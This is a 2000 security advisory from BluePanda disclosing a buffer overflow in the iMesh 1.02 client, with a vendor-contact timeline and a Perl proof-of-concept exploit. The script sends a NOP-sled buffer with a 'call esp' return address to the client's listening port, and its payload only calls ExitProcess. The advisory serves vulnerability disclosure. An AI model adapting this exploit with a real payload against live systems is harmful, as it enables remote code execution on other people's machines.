imbof102.txt

`================================================================  
BluePanda Vulnerability Announcement: iMesh 1.02 Build 116/117  
29/06/2000 (dd/mm/yyyy)  
  
[email protected]  
http://bluepanda.box.sk/  
================================================================  
  
====================  
Brief description:  
====================  
  
iMesh 1.02 builds 116 and 177 are vulnerable to a buffer overflow that can be  
exploited to execute arbitrary code. Once iMesh connects to a server, it  
begins listening on a TCP port (varies). An attacker can connect to this port  
and cause an overflow which will overwrite EIP, effectively redirecting the  
flow of execution.  
  
================  
Vendor status:  
================  
  
iMesh were notified of this vulnerability on Sunday the 18th of June. Proof  
of concept was provided, and I did not receive a response from them until  
that Thursday. I replied that night, and did not receive a reply until the  
following Tuesday (the 27th of June). I was informed that the problem had  
been fixed, but a patch would not be made available to the public, and the  
changes would be incorporated into the next version of iMesh - the release  
date of which I was not given.  
  
=====================  
Affected versions:  
=====================  
  
Vulnerable: iMesh 1.02 Build 116/117, possibly prior versions (untested).  
Immune: No publicly released version of iMesh as of 29/06/2000 (dd/mm/yyyy).  
  
===================  
Proof of concept:  
===================  
  
#!/usr/bin/perl  
#  
# iMesh 1.02 Build 116/117 client buffer overflow  
# Blue Panda - [email protected]  
# http://bluepanda.box.sk/  
#  
# ----------------------------------------------------------  
# Disclaimer: this file is intended as proof of concept, and  
# is not intended to be used for illegal purposes. I accept  
# no responsibility for damage incurred by the use of it.  
# ----------------------------------------------------------  
#  
# Note: The payload executed by this script just calls ExitProcess (causing  
# iMesh to exit silently).  
#  
  
use IO::Socket;  
  
$host = "localhost";  
$port = "4011"; # This may require adjustment.  
  
# Call ExitProcess.  
$payload = "\xff\x25\x18\xb2\x4c\x00";  
  
$count = 0;  
$es = "";  
while($count < 0x272d) {  
$es .= "\x90";  
$count += 1;  
}  
$es .= "\x43\x04\x43\x00"; # IMESHCLIENT.EXE, call esp  
$count = 0;  
while($count < 2048) {  
$es .= "\x90";  
$count += 1;  
}  
$es .= $payload; # Tack the payload onto the end.  
  
print "Connecting to $host:$port...";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "unable to connect.\n";  
print "done.\n";  
print $socket "$es";  
  
print "Waiting 5 seconds...\n";  
sleep(5);  
  
# Done.  
close($socket);  
print "Finished.\n";  
  
`